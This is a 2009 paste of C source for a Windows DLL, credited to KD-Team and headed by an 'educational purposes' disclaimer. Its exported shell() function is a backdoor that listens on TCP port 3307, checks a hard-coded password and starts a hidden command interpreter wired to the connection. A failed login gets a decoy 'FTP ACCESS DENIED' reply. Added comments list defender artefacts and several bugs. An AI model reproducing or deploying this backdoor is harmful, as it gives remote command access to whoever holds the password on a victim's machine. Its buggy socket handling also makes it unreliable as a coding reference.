
DiabloHorn

a guest Nov 9th, 2009 198 Never
  1. /*
  2. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  3. +This is a little Disclaimer for if you haven't read the one on our site.          +
  4. +The tools and tutorials KD-Team develops and publishes are only meant for         +
  5. +educational purpose only. WE DO NOT encourage the use of these tools and          +
  6. +tutorials for malicious purpose. We learned a lot during the development of them  +
  7. +so we hope you also learn and don't just use it without any brains.               +
  8. +We take completely NO responsibility for any damage caused by them nor            +
  9. +are we or our isp responsible for what you do with them.                          +
  10. +Greetz: KD-Team                                                                   +
  11. +http://www.kd-team.com                                                            +
  12. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  13. */
  14. #include <winsock2.h>
  15. #include <windows.h>
  16. #include <stdio.h>
  17. #include <stdlib.h>
  18.  
  19.  
  20. #define SERVPORT 3307 //TCP port the listening socket in shell() is bound to
  21. #define RCVBUFSIZE 32 //size of echoBuffer; shell() reads at most RCVBUFSIZE-1 bytes in its single recv()
  22. #define PASSWORD "itworksihope" //compared with strcmp() in shell(); hard-coded, so it is readable as a plain string in the compiled DLL and is sent unencrypted by the client
  23.  
  24. extern "C" __declspec (dllexport) int shell()
  25. {
      //Exported entry point (C linkage), no parameters. Listens on TCP SERVPORT on
      //every local interface, handles one connection at a time and compares the
      //first bytes received with PASSWORD. On a match it starts the program named
      //by %COMSPEC% with stdin/stdout/stderr set to the accepted socket and blocks
      //until that process exits; on a mismatch it sends "FTP ACCESS DENIED\n" and
      //closes the connection. Returns 0 once the accept loop has ended.
      //
      //For defenders, the artefacts visible in this code are: a listener on TCP
      //SERVPORT owned by whichever process loaded the DLL, a command-interpreter
      //child of that process started with a hidden window and inherited handles,
      //the literal reply "FTP ACCESS DENIED\n" on a port where nothing speaks FTP,
      //and the PASSWORD literal inside the binary. Password and session travel in
      //clear text: the function only uses plain recv()/send() and raw socket handles.
  26. //locals for the socket setup and for the spawned process
  27.         WSADATA wsa;
  28.         SOCKET hSock;
  29.     SOCKET hLstnSock;
  30.         unsigned int ClientLen;
  31.         struct sockaddr_in ServAddr;
  32.         struct sockaddr_in ClientAddr;
  33.         STARTUPINFO si;
  34.         PROCESS_INFORMATION pi={0};
  35.         int BytesRcvd;
  36.         char *tok; //receives the strtok() result below but is never read
  37.         char echoBuffer[RCVBUFSIZE]; //not initialised before the recv() below
  38.         char comspec[MAX_PATH];
  39.  
  40. //setting up wsa (version 2.0 requested). NOTE(review): the failure branch is empty, so a failed start-up is ignored
  41.         if(WSAStartup(MAKEWORD(2,0),&wsa) != 0)
  42.         {
  43.                 //printf("WSAStartup() failed\n");
  44.         }
  45.  
  46. //zeroing out the struct and filling it: IPv4, INADDR_ANY (all local interfaces), port SERVPORT
  47.         memset(&ServAddr,0,sizeof(ServAddr));
  48.         ServAddr.sin_family = AF_INET;
  49.         ServAddr.sin_addr.s_addr = htonl(INADDR_ANY);
  50.         ServAddr.sin_port = htons(SERVPORT);
  51.  
  52. //making the socket NOTE it must be WSASocket else it won't pass the handle to the Process
      //NOTE(review): Winsock reports failure as INVALID_SOCKET (the accept() check below uses it) and
      //SOCKET is presumably unsigned here, so this "< 0" test likely never fires - confirm.
  53.         if((hLstnSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,0,0,0)) < 0)
  54.         {
  55.                 //printf("socket() %d failed\n",WSAGetLastError());
  56.                 WSACleanup();
  57.         }
  58. //binding the listening socket. NOTE(review): on failure the socket is closed but execution still continues to listen()
  59.         if(bind(hLstnSock,(struct sockaddr *)&ServAddr,sizeof(ServAddr)) < 0)
  60.         {
  61.                 //printf("bind() %d failed\n",WSAGetLastError());
  62.                 closesocket(hLstnSock);
  63.         }
  64. //listening with a backlog of 1; a failure here also falls through to the accept loop
  65.         if(listen(hLstnSock,1)< 0)
  66.         {
  67.                 //printf("listen() %d failed\n",WSAGetLastError());
  68.                 closesocket(hLstnSock);
  69.                 WSACleanup();
  70.         }
  71.  
  72. //the never ending loop :p (it is left only through the break statements below)
  73.         while(1)
  74.         {
  75.                 ClientLen = sizeof(ClientAddr);
  76. //accepting the incoming connection; a failed accept() ends the loop
  77.                 hSock = accept(hLstnSock, (struct sockaddr *)&ClientAddr, (int *)&ClientLen);
  78.                 if(hSock == INVALID_SOCKET)
  79.                 {
  80.                         break;
  81.                 }
      //one read of at most RCVBUFSIZE-1 bytes; recv() adds no terminator and echoBuffer is never cleared,
      //so the string functions below work on whatever bytes follow the received data
  82.                 BytesRcvd =     recv(hSock, echoBuffer,RCVBUFSIZE -1,0);
  83.                 if(BytesRcvd > 0)
  84.                 {
  85. //this is the little authentication sequence: an exact strcmp() match against PASSWORD
  86. //a strtok() is needed since -1 doesn't always do what one wants.
      //strtok() ends the first token at the following '\n' in place; strcmp() then reads echoBuffer itself, not tok
  87.  
  88.                         tok = strtok(echoBuffer,"\n");
  89.                         if((strcmp(echoBuffer,PASSWORD))==0)
  90.                         {
  91.                                 //printf("Pass correct\n");
  92. //when succeeded the actual shell spawning happens.
  93.  
  94.                                 memset(&si,0,sizeof(si));
  95.                                 GetStartupInfo(&si);
  96. //setting the flags correct: use the three std handles set below and honour wShowWindow (SW_HIDE)
  97.                                 si.cb = sizeof(si);
  98.                                 si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
  99.                                 si.wShowWindow = SW_HIDE;
  100.                                 si.hStdInput = (HANDLE)hSock; //stdin, stdout and stderr of the child are all the accepted socket
  101.                                 si.hStdOutput = (HANDLE)hSock;
  102.                                 si.hStdError =(HANDLE)hSock;
  103. //this is just handier than defining cmd.exe by hand: the program path is read from %COMSPEC% of the loading process
       //NOTE(review): this break and the one after CreateProcess() leave the loop without closing hSock
  104.                                 if(GetEnvironmentVariable("COMSPEC", comspec, MAX_PATH) == 0)
  105.                                 {
  106.                                         //printf("Environment var failed\n");
  107.                                         break;
  108.                                 }
  109. //creating the process that will create the shell; bInheritHandles is TRUE, so the child inherits the socket handle
  110.                                 if(!CreateProcess(NULL,comspec, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, 0, NULL, &si, &pi)) //CREATE_NO_WINDOW
  111.                                 {
  112.                                         //printf("process creation failed\n");
  113.                                         break;
  114.                                 }
  115. //waiting till finished; no further connection is accepted while the child runs
  116.                                 WaitForSingleObject(pi.hProcess, INFINITE);
  117. //little cleanup
  118.                                 CloseHandle(pi.hProcess);
  119.                                 CloseHandle(pi.hThread);
  120.                                 closesocket(hSock);
  121.                         }
  122.                         else
  123.                         {
  124. //if auth sequence failed well kick the bastard out.
       //the reply text mentions FTP although nothing in this function speaks FTP
  125.                                 //printf("incorrect pass\n");
  126.                                 send(hSock,"FTP ACCESS DENIED\n",strlen("FTP ACCESS DENIED\n"),0);
  127.                                 closesocket(hSock);
  128.                         }
  129.                 }
       //NOTE(review): when recv() returns <= 0 the accepted socket is not closed before the next accept()
  130.  
  131.         }
  132.         closesocket(hLstnSock);
  133.         return 0;
  134. }